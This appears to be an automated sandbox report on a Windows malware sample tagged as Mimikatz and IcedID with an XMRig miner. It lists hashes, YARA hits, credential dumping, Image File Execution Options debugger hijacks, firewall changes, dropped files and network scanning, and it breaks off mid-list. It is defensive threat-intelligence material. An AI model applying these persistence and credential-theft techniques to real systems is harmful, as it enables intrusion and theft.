Analysis
-
max time kernel
126s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-11-2024 09:38
Behavioral task
behavioral1
Sample
2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe
-
Size
9.7MB
-
MD5
5a8185e3c49304f8f94aa2dafdafd5a5
-
SHA1
c352dd312deeae9215d3df6eabf63194b8217069
-
SHA256
41184899f11833556ed5d9d7e209adcf0f0810c6fa09bc6671a42d1f71c31177
-
SHA512
0e4df817e9b14cc0b587d0be12385d65d59e48f7e9c30a1317fb30694319350fb99e8447ef3ceee3ac242f5978ff0174e3ead46c9c22a2779cbbc9567acb08a0
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1500 created 1692 1500 mgmtcbi.exe 37 -
Xmrig family
-
Contacts a large (18873) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/4488-182-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp xmrig behavioral2/memory/4488-187-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp xmrig behavioral2/memory/4488-201-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp xmrig behavioral2/memory/4488-214-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp xmrig behavioral2/memory/4488-222-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp xmrig behavioral2/memory/4488-230-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp xmrig behavioral2/memory/4488-247-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp xmrig behavioral2/memory/4488-497-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp xmrig behavioral2/memory/4488-498-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp xmrig behavioral2/memory/4488-564-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/4748-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4748-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0007000000023cb6-6.dat mimikatz behavioral2/memory/3980-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2340-138-0x00007FF7642F0000-0x00007FF7643DE000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts mgmtcbi.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe mgmtcbi.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4692 netsh.exe 4932 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 3980 mgmtcbi.exe 1500 mgmtcbi.exe 3028 wpcap.exe 3996 liuibviiz.exe 2340 vfshost.exe 4584 iyibcmiuc.exe 4488 ltbtbc.exe 488 xohudmc.exe 4228 iyibcmiuc.exe 5032 umueiy.exe 572 iyibcmiuc.exe 2396 mgmtcbi.exe 1280 iyibcmiuc.exe 4268 iyibcmiuc.exe 4888 iyibcmiuc.exe 1724 iyibcmiuc.exe 1568 iyibcmiuc.exe 2780 iyibcmiuc.exe 2436 iyibcmiuc.exe 1444 iyibcmiuc.exe 4860 iyibcmiuc.exe 1532 iyibcmiuc.exe 940 iyibcmiuc.exe 1116 iyibcmiuc.exe 244 iyibcmiuc.exe 788 iyibcmiuc.exe 4524 btuizeiim.exe 5260 mgmtcbi.exe -
Loads dropped DLL 12 IoCs
pid Process 3028 wpcap.exe 3028 wpcap.exe 3028 wpcap.exe 3028 wpcap.exe 3028 wpcap.exe 3028 wpcap.exe 3028 wpcap.exe 3028 wpcap.exe 3028 wpcap.exe 3996 liuibviiz.exe 3996 liuibviiz.exe 3996 liuibviiz.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 67 ifconfig.me 68 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 mgmtcbi.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\umueiy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content mgmtcbi.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\umueiy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 mgmtcbi.exe File created C:\Windows\system32\wpcap.dll wpcap.exe -
resource yara_rule behavioral2/files/0x0007000000023d0b-134.dat upx behavioral2/memory/2340-135-0x00007FF7642F0000-0x00007FF7643DE000-memory.dmp upx behavioral2/memory/2340-138-0x00007FF7642F0000-0x00007FF7643DE000-memory.dmp upx behavioral2/files/0x0007000000023d16-141.dat upx behavioral2/memory/4584-142-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/4584-146-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/4488-150-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp upx behavioral2/files/0x0007000000023d13-149.dat upx behavioral2/memory/4228-172-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/572-176-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/4488-182-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp upx behavioral2/memory/1280-185-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/4488-187-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp upx behavioral2/memory/4268-190-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/4888-194-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/1724-198-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/4488-201-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp upx behavioral2/memory/1568-203-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/2780-207-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/2436-211-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/4488-214-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp upx behavioral2/memory/1444-216-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/4860-220-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/4488-222-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp upx behavioral2/memory/1532-224-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/940-227-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/4488-230-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp upx behavioral2/memory/1116-232-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/244-234-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/788-236-0x00007FF64F8B0000-0x00007FF64F90B000-memory.dmp upx behavioral2/memory/4488-247-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp upx behavioral2/memory/4488-497-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp upx behavioral2/memory/4488-498-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp upx behavioral2/memory/4488-564-0x00007FF6CC4F0000-0x00007FF6CC610000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\ybemumnz\svschost.xml mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\svschost.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\scan.bat mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\xdvl-0.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\svschost.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\svschost.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exe mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\spoolsrv.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\Packet.dll mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\docmicfg.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\cnli-1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\Corporate\vfshost.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\btuizeiim.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\ssleay32.dll mgmtcbi.exe File created C:\Windows\ybemumnz\docmicfg.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\schoedcl.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\Shellcode.ini mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\ip.txt mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\crli-0.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\ucl.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\schoedcl.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\Corporate\mimidrv.sys mgmtcbi.exe File created C:\Windows\jhetmctcv\Corporate\mimilib.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\upbdrjv\swrpwe.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\libeay32.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\libxml2.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\tucl-1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\vimpcsvc.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\docmicfg.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\spoolsrv.xml mgmtcbi.exe File created C:\Windows\ybemumnz\vimpcsvc.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\AppCapture64.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\coli-0.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\spoolsrv.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\docmicfg.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\spoolsrv.xml mgmtcbi.exe File created C:\Windows\ybemumnz\spoolsrv.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\zlib1.dll mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\mgmtcbi.exe 2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\trfo-2.dll mgmtcbi.exe File opened for modification C:\Windows\jhetmctcv\bctzbzczb\Result.txt btuizeiim.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\vimpcsvc.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\vimpcsvc.xml mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\schoedcl.xml mgmtcbi.exe File created C:\Windows\ybemumnz\mgmtcbi.exe 2024-11-16_5a8185e3c49304f8f94aa2dafdafd5a5_hacktools_icedid_mimikatz.exe File created C:\Windows\jhetmctcv\bctzbzczb\wpcap.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\exma-1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\schoedcl.xml mgmtcbi.exe File created C:\Windows\ybemumnz\schoedcl.xml mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\vimpcsvc.xml mgmtcbi.exe File created C:\Windows\ime\mgmtcbi.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\wpcap.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\posh-0.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\trch-1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\tibe-2.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\docmicfg.xml mgmtcbi.exe File opened for modification C:\Windows\jhetmctcv\Corporate\log.txt cmd.exe File opened for modification C:\Windows\jhetmctcv\bctzbzczb\Packet.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\svschost.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\AppCapture32.dll mgmtcbi.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4284 sc.exe 3300 sc.exe 1084 sc.exe 1824 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 